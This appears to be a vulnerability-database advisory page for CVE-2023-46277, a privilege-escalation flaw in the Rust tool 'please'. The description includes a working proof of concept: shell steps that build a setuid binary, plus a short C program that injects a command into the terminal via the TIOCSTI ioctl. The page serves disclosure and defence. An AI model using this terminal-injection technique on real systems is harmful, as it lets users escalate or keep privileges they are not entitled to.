CVE-2023-46277
HIGH7.8EPSS 0.07%Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX
Description
please is vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX on systems where they are not disabled. Here is how to see it in action: ``` $ cd "$(mktemp -d)" $ git clone --depth 1 https://gitlab.com/edneville/please.git $ cd please/ $ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9 $ cargo test && cargo build --release $ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini $ sudo chown root:root ./target/release/please $ sudo chmod u+s ./target/release/please $ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c #include <sys/ioctl.h> int main(void) { const char *text = "id\n"; while (*text) ioctl(0, TIOCSTI, text++); return 0; } TIOCSTI_C_EOF $ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c $ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody ``` Please note that: This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.
Affected packages (3)
- crates.io/pleaserfrom 0, <= 0.5.4
- crates.io/pleaser>= 0.0.0-0
- Debian/rust-pleaserfrom 0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | HIGH7.8 | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
References (8)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2023-46277
- ADVISORYhttps://security-tracker.debian.org/tracker/CVE-2023-46277
- PATCHhttps://crates.io/crates/pleaser
- PATCHhttps://gitlab.com/edneville/please
- WEBhttps://github.com/rustsec/advisory-db/pull/1798
- WEBhttps://gitlab.com/edneville/please/-/issues/13
- WEBhttps://gitlab.com/edneville/please/-/merge_requests/69#note_1594254575
- WEBhttps://rustsec.org/advisories/RUSTSEC-2023-0066.html